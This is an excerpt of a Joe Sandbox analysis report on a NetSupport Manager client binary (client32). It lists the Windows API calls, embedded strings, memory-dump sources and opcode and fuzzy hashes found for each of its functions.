                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave_memset
                                                                                                • String ID: RESULT$b
                                                                                                • API String ID: 3751686142-4141403093
                                                                                                • Opcode ID: e08b1dfd7a42c48e481484b5d81b98e7c484166958a5075c104ccf3b039cdb54
                                                                                                • Instruction ID: 2a7d85ad16726462042591aec7ce3d9317c972de5afde435366d9a9ad447add9
                                                                                                • Opcode Fuzzy Hash: e08b1dfd7a42c48e481484b5d81b98e7c484166958a5075c104ccf3b039cdb54
                                                                                                • Instruction Fuzzy Hash: B1217CB1C00208AEEF50CFA4D8057AEBBF4FF09304F0080B9E619E7280EB755A549BA1
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset_strncpy
                                                                                                • String ID: apptype == APP_SLAVE$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$sv.slavetype == APP_SLAVE
                                                                                                • API String ID: 3140232205-2748231828
                                                                                                • Opcode ID: e3038d6298146a9ab0c2b6de90e234fc257a975efd75c18a8424611759d61146
                                                                                                • Instruction ID: ed84bd1d133d8dc2ecc0038964b6be4dd616123b3e23fd509028210a3202644c
                                                                                                • Opcode Fuzzy Hash: e3038d6298146a9ab0c2b6de90e234fc257a975efd75c18a8424611759d61146
                                                                                                • Instruction Fuzzy Hash: B0110A7664071167EB158A16BC46BFF33549B12799F014035FF09A77C1F372A89483E5
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32(986B9CC5), ref: 69CFFE0A
                                                                                                • EnterCriticalSection.KERNEL32 ref: 69CFFE19
                                                                                                • LeaveCriticalSection.KERNEL32 ref: 69CFFE8C
                                                                                                  • Part of subcall function 69CFF540: InitializeCriticalSection.KERNEL32(69D2CF98,986B9CC5,?,?,?,?,?,69D1EFC8,000000FF), ref: 69CFF574
                                                                                                  • Part of subcall function 69CFF540: EnterCriticalSection.KERNEL32(69D2CF98,986B9CC5,?,?,?,?,?,69D1EFC8,000000FF), ref: 69CFF590
                                                                                                  • Part of subcall function 69CFF540: LeaveCriticalSection.KERNEL32(69D2CF98,?,?,?,?,?,69D1EFC8,000000FF), ref: 69CFF5D8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$CurrentInitializeThread
                                                                                                • String ID: Refcount.cpp$p.second
                                                                                                • API String ID: 2150084884-1554893322
                                                                                                • Opcode ID: a54e2f2ebe5902b7588c8f1f695911c93549cbfe4e996b3c41c548768eaf5176
                                                                                                • Instruction ID: 4a5d992ff7986def5e619b0714be8fc22ee8ad0c5c499c0fdbd3db3bb6970436
                                                                                                • Opcode Fuzzy Hash: a54e2f2ebe5902b7588c8f1f695911c93549cbfe4e996b3c41c548768eaf5176
                                                                                                • Instruction Fuzzy Hash: B22196B6904608AFDB11DF94D841FEFF7B8FF19314F10812AEA5693640E7306609CB91
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __strdup
                                                                                                • String ID: *this==src$IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 838363481-1357550281
                                                                                                • Opcode ID: 016a92cb1483b9b3bf1303177cd3d28a672a54a63873ca4648f8e4d9f7c07a1b
                                                                                                • Instruction ID: cf60de212e2774dd4c116dc4bedaf54679d1268372371d863a919dfb9cbb242c
                                                                                                • Opcode Fuzzy Hash: 016a92cb1483b9b3bf1303177cd3d28a672a54a63873ca4648f8e4d9f7c07a1b
                                                                                                • Instruction Fuzzy Hash: AF110EF5A006066BC704DB18F815E2AB7A8AF8535CB00C035FB999BB00F771AD0B5791
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 69CFFFD8
                                                                                                  • Part of subcall function 69CFDAC0: SetEvent.KERNEL32(00000000), ref: 69CFDAE4
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 69D0000C
                                                                                                  • Part of subcall function 69CFFBC0: EnterCriticalSection.KERNEL32(?,?,750A4D1D,69D0001D), ref: 69CFFBC8
                                                                                                  • Part of subcall function 69CFFBC0: LeaveCriticalSection.KERNEL32(?), ref: 69CFFBD5
                                                                                                • PostMessageA.USER32 ref: 69D00034
                                                                                                • PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 69D0003B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
                                                                                                • String ID: Queue
                                                                                                • API String ID: 620033763-3191623783
                                                                                                • Opcode ID: c9bdb22b0c5437b0c602fadfafc90ea69592b09b854d51824fb9e337985eaf55
                                                                                                • Instruction ID: aa9ee7fa5209da3e0dd1839fe93b25f8ce66fe4d3b1f54b556150c9cec9c8d37
                                                                                                • Opcode Fuzzy Hash: c9bdb22b0c5437b0c602fadfafc90ea69592b09b854d51824fb9e337985eaf55
                                                                                                • Instruction Fuzzy Hash: C911AC75A41640ABEF21DF74D961B0A77A8AF4A794F00C036EA0597A80DB70EC11CBA5
                                                                                                APIs
                                                                                                • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                                • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                                • RegisterClassA.USER32(?), ref: 11093483
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                • String ID: NSMClassList
                                                                                                • API String ID: 2883182437-2474587545
                                                                                                • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                                • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • wsprintfA.USER32 ref: 69CFDC04
                                                                                                • _memset.LIBCMT ref: 69CFDC27
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_malloc_memsetwsprintf
                                                                                                • String ID: Can't alloc %u bytes$Refcount.cpp
                                                                                                • API String ID: 2405090531-3988092936
                                                                                                • Opcode ID: 7aee5c1d1114a1df1cb1a86670246867f3fbe7ae79bbf102fe7657a5f2a46ffa
                                                                                                • Instruction ID: dec2e19c354cc3e506af3b1b259caafcaa0acc61d8c5ca3b8db2c0f5cd3ff07d
                                                                                                • Opcode Fuzzy Hash: 7aee5c1d1114a1df1cb1a86670246867f3fbe7ae79bbf102fe7657a5f2a46ffa
                                                                                                • Instruction Fuzzy Hash: 90F0F6B690011867C710EB64AD05F9FB77C9F86B18F4040B9FF09A7141E734AA0686E5
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?,?), ref: 69CE9188
                                                                                                • GetUserNameA.ADVAPI32(69CF6AD7,?), ref: 69CE91CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: NameUserVersion
                                                                                                • String ID: *CurrentUserName$@$client
                                                                                                • API String ID: 427591506-3887416126
                                                                                                • Opcode ID: 8b98b8e3083ef819af30078adb8cb77cf4ce3ff1ed044e057610671372e20820
                                                                                                • Instruction ID: 1ded5f8531b8b2e30c4630f1164c75a83eee0cdbf340ae824160c540540f6f17
                                                                                                • Opcode Fuzzy Hash: 8b98b8e3083ef819af30078adb8cb77cf4ce3ff1ed044e057610671372e20820
                                                                                                • Instruction Fuzzy Hash: 6401A274D00118DBEB10EF64D91AFADB3B8EB05318F4080E9EA0E62141DA311E488BA4
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69CFABDA
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_malloc
                                                                                                • String ID: IsA()$IsEmpty()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 501242067-2615622132
                                                                                                • Opcode ID: 497d46d29cfd4d802aca4b1825aee29e93bf021378c96617572d71085c5e42db
                                                                                                • Instruction ID: 4aca94c97bdef78dbaf4c7b93d7aa6d9c6ea8fcdc4a819bb7a71cb3bf9b8bcff
                                                                                                • Opcode Fuzzy Hash: 497d46d29cfd4d802aca4b1825aee29e93bf021378c96617572d71085c5e42db
                                                                                                • Instruction Fuzzy Hash: DBF09AF16106009FD324DF48EC01B0AB7D89F5971CF40C479FB599BA81E372AC4A97A2
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11145463
                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage,?,11037F05), ref: 11145475
                                                                                                • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                • API String ID: 145871493-545709139
                                                                                                • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                                • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                                • SendMessageA.USER32(00000000,0000045B,11020C43,00000000,?,11020C43,00000000,00000001), ref: 110ED10D
                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04000000,?,11020C43,00000000,00000001), ref: 110ED11C
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                • API String ID: 2446111109-1196874063
                                                                                                • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                                • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                                APIs
                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AtomDeleteGlobal$LongWindow
                                                                                                • String ID: qu
                                                                                                • API String ID: 964255742-2766958120
                                                                                                • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                                • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                                APIs
                                                                                                • FindWindowA.USER32 ref: 11017428
                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                                • PostMessageA.USER32 ref: 11017458
                                                                                                • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageWindow$FindLongPostSend
                                                                                                • String ID: IPTip_Main_Window
                                                                                                • API String ID: 3445528842-293399287
                                                                                                • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                                • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 4048096073-0
                                                                                                • Opcode ID: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
                                                                                                • Instruction ID: 904dacae52740412e51e84f1f1c780ec9544c24c74b26df15612c618d74cb4f3
                                                                                                • Opcode Fuzzy Hash: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
                                                                                                • Instruction Fuzzy Hash: 4C51D670A00305DBCB10CFAACA60A9EBB71BF51364F108239EC74D7994E771DA61CB91
                                                                                                APIs
                                                                                                • __strdup.LIBCMT ref: 69CFAC64
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 69CFACA1
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 69CFACB7
                                                                                                • _malloc.LIBCMT ref: 69CFACC6
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 69CFACE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__strdup_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2291067320-0
                                                                                                • Opcode ID: 1d26e74370261f319d98c9b83190a2371fca1f8d81201b7fedbc611da68c9142
                                                                                                • Instruction ID: 3df07b6a67e533ed8639357dc3acbb40865553732efb93fa1a841068ae789a3b
                                                                                                • Opcode Fuzzy Hash: 1d26e74370261f319d98c9b83190a2371fca1f8d81201b7fedbc611da68c9142
                                                                                                • Instruction Fuzzy Hash: 1731C071A04209AFE710CF25CC59FABBBB8EF46764F14C165ED45AB280E671A905CB90
                                                                                                APIs
                                                                                                Strings
                                                                                                • %02x, xrefs: 11081610
                                                                                                • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                                • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf
                                                                                                • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                                • API String ID: 2111968516-476189988
                                                                                                • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                                • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                                APIs
                                                                                                  • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                • DeleteObject.GDI32(?), ref: 1111F516
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteObject$PaletteSelect
                                                                                                • String ID:
                                                                                                • API String ID: 2820294704-0
                                                                                                • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                                • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                                • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                                • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                                APIs
                                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                                  • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                                  • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                                • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                                • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                                • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                                • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                                Strings
                                                                                                • Global\Client32Provider, xrefs: 1104F1BB
                                                                                                • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                                • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                                • API String ID: 3682529815-1899068400
                                                                                                • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
